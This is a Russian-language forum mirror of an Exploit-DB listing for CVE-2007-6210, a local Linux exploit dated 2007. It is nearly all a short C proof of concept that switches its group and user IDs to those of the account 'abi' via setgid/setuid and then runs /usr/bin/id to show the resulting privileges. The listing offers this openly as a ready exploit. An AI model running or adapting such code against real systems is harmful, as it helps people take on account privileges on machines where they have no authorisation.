- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 30839
- Проверка EDB
-
- Пройдено
- Автор
- BAS VAN SCHAIK
- Тип уязвимости
- LOCAL
- Платформа
- LINUX
- CVE
- cve-2007-6210
- Дата публикации
- 2007-12-03
C:
#include <sys/types.h>
#include <unistd.h>
#include <pwd.h>
#include <stdio.h>
int main()
{
struct passwd *pw;
pw = getpwnam("abi");
FILE *pipe;
char buf[25];
setgid(pw->pw_gid);
setuid(pw->pw_uid);
printf("my gid: %d\n", getegid());
printf("my uid: %d\n", getuid());
pipe = popen("/usr/bin/id", "r");
while (fgets(buf, sizeof buf, pipe)) {
printf("%s", buf);
}
printf("\n");
pclose(pipe);
}- Источник
- www.exploit-db.com
